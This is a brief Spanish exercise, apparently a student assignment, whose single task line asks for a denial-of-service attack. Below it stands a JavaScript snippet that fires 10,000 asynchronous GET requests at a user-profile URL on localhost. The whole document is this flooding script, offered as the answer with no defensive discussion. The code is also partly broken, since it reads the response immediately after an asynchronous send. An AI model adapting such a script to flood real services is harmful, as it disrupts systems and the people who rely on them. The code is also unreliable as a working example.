1. Elaborar un correcto ataque utilizando herramientas para denegación de servicio.
Script function dos(target) { var xhr = new XMLHttpRequest(); var url = "http://localhost:8080/users/profile/" + target; xhr.open('GET', url, true); xhr.send(); return xhr.responseText; } var target = "1"; for (let i = 0; i < 10000; i++) { dos(target); }